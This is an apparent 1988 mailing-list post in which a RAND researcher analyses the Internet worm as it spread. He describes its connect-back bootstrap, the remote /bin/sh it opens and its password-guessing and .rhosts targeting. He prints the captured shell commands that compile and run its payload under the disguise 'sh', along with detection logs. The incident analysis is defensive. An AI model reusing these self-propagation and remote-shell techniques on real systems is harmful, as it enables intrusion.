salzman@RAND.ORG (Isaac) (11/04/88)
After carefully leaving the sendmail ``hole'' open on our Internet machine I've been able to track (for the most part) what the virus is doing and how it's spreading itself. The C program that is uploaded and compiled is only the start. After it's compiled it's run with the following arguments: argv[1] is the Internet addr of the infecting host, argv[2] is the port to connect to on that host and argv[3] is the "magic" number. It connects back to the infecting host and *carefully* transfers 3 files over. The socket remains open and /bin/sh is then exec'd so the infecting host can send shell commands to it after the files are transferred. Following is an excerpt from the log file of my hacked up version of the .c file that's uploaded: virus: pid=6828, args; x15886501 10.4.0.7 29451 15525687 connection on sockect 0 active trying to write to file 'x15901447,sun3.o', len=47165 file 'x15901447,sun3.o' written! trying to write to file 'x3338475,vax.o', len=45734 file 'x3338475,vax.o' written! trying to write to file 'x11091853,l1.c', len=1542 file 'x11091853,l1.c' written! starting up 'snoop' to watch the rest of the socket "Snoop" is a shell script that's run in place of /bin/sh to capture the shell commands that are being sent from the infecting host. Following is a log of the shell commands are being sent: PATH=/bin:/usr/bin:/usr/ucb rm -f sh if [ -f sh ] then P=x10903971 else P=sh fi cc -o $P x15901447,sun3.o ./$P -p $$ x15901447,sun3.o x3338475,vax.o x11091853,l1.c rm -f $P cc -o $P x3338475,vax.o ./$P -p $$ x15901447,sun3.o x3338475,vax.o x11091853,l1.c rm -f $P rm -f x15901447,sun3.o $P rm -f x3338475,vax.o $P rm -f x11091853,l1.c $P They real key is to find out what ./$P is actually doing. Knowing the arguments to the program that's uploaded and executed may be 1/2 the battle there - especially if you're running on a Sun 3 with SunOS 4.0 (let's thank Sun for the "trace" command). So it's starting itself again, probably using the pid ($$) as random seed, the rest of the arguments being the names of the files to send off to the next victim. It looks real innocent when you see "(sh)" in a ps listing (note what $P is set to).... Earlier today Jim Gillogly (jim@rand.org) was able to find a table of potential passwords that are probably used to crack accounts on the infected machine. Some other research into the matter strongly suggests that .rhosts and hosts.equiv files are used to target the next victim (that seems to be common knowledge). It apparently tries one of two ways to break into a machine. First it seems to try the rsh port. I've hacked up rshd to report all outside attempts via syslog. It would consistenly come in over rsh a minute or so before trying the SMTP port. Terry West (terry@rand.org) hacked sendmail to report attempts to use the 'debug' command to the SMTP server and log that with syslog as well, so we get stuff like this: Nov 3 18:10:12 rand-unix rsh[4311]: external address detected port=2,fam=1008,addr=10.4.0.7 Nov 3 18:10:43 rand-unix sendmail[4328]: AA04328: DEBUG set from: SM.UNISYS.COM Nov 3 18:43:08 rand-unix rsh[5106]: external address detected port=2,fam=1021,addr=10.2.0.10 Nov 3 18:43:41 rand-unix sendmail[5126]: AA05126: DEBUG set from: XN.LL.MIT.EDU Nov 3 18:55:59 rand-unix rsh[5377]: external address detected port=2,fam=991,addr=128.52.32.14 Nov 3 18:57:18 rand-unix sendmail[5421]: AA05421: DEBUG set from: XN.LL.MIT.EDU Nov 3 19:03:56 rand-unix rsh[5652]: external address detected port=2,fam=1015,addr=10.4.0.7 Nov 3 19:29:34 rand-unix rsh[6725]: external address detected port=2,fam=1003,addr=10.4.0.7 Nov 3 19:48:14 rand-unix rsh[7592]: external address detected port=2,fam=996,addr=10.4.0.7 Nov 3 19:48:46 rand-unix sendmail[7614]: AA07614: DEBUG set from: SM.UNISYS.COM Nov 3 19:55:50 rand-unix rsh[7698]: external address detected port=2,fam=1018,addr=10.6.0.94 Nov 3 19:56:25 rand-unix sendmail[7712]: AA07712: DEBUG set from: UXC.CSO.UIUC.EDU So that's the scoop, so far. Of course by the time this makes it out to the tcp-ip list this will be old news, eh? :-) Now to tear apart the fake "sh"..... Ciao! -- * Isaac J. Salzman ---- * The RAND Corporation - Information Sciences Dept. /o o/ / * 1700 Main St., PO Box 2138, Santa Monica, CA 90406-2138 | v | | * AT&T: +1 213-393-0411 x6421 or x7923 (ISL lab) _| |_/ * ARPA: salzman@RAND.ORG or salzman@rand-unix.ARPA / | | * UUCP: ...!{cbosgd,decvax,sdcrdcf}!randvax!salzman | | |